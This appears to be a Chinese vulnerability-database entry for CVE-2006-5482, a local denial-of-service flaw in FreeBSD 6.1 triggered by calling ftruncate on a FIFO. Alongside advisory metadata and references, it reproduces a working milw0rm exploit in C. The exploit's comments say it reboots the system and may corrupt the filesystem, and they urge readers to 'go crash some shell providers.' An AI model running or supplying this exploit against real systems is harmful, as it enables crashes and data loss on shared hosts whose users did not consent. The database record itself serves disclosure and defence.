FreeBSD 'ufs_vnops.c' ftruncate函数本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111276 漏洞类型 其他
发布时间 2006-10-13 更新时间 2006-10-24
CVE编号 CVE-2006-5482 CNNVD-ID CNNVD-200610-401
漏洞平台 BSD CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/2541
https://www.securityfocus.com/bid/87196
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-401
|漏洞详情
FreeBSD6.1的ufs_vnops.c允许本地用户通过调用并非VREG,VLNK或VDIR文件类型的ftruncate函数(未在POSIX中定义)来引起不明拒绝服务攻击。
|漏洞EXP
/* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31 13:15:29 UTC
   Log: According to POSIX, the result of ftruncate(2) is unspecified
   for file types other than VREG, VDIR and shared memory objects.
   We already handle VREG, VLNK and VDIR cases.  Silently ignore
   truncate requests for all the rest. PR kern/98064

   lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"!
   tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the time of writing)
   - it just makes the system reboot, and with a bit of luck fucks up the filesystem.
   wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
   usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers.
   
*/

#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(){
mkfifo("lol",0x1b6);
int fd = open("lol",O_RDWR); 
ftruncate(fd,12345);
close(fd);
}

// milw0rm.com [2006-10-13]
|受影响的产品
FreeBSD FreeBSD 6.1
|参考资料

来源:SECUNIA
名称:22413
链接:http://secunia.com/advisories/22413
来源:MLIST
名称:[freebsd-cvs-src]20060531cvscommit:src/sys/ufs/ufsufs_vnops.c
链接:http://lists.freebsd.org/pipermail/cvs-src/2006-May/064488.html
来源:BID
名称:20522
链接:http://www.securityfocus.com/bid/20522